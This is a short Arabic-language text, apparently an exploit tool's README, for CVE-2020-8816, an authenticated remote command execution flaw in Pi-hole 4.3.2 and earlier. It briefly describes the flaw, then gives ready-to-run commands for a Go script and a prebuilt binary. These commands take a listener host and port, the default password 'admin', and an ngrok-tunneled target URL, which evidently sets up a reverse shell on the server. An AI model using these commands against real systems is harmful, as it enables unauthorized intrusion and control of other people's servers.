
Pi-hole ( <= 4.3.2) تنفيذ تعليمات برمجية عن بُعد مصادق عليه.
Pi-hole (الإصدارات <= 4.3.2) متأثر بثغرة تنفيذ الأوامر عن بُعد. يمكن للمستخدم المصادق على بوابة الويب تنفيذ أوامر عشوائية على الخادم الأساسي بصلاحيات المستخدم المحلي الذي يقوم بتشغيل الخدمة.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
أو قم بتنزيل الثنائي CVE-2020-8816 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/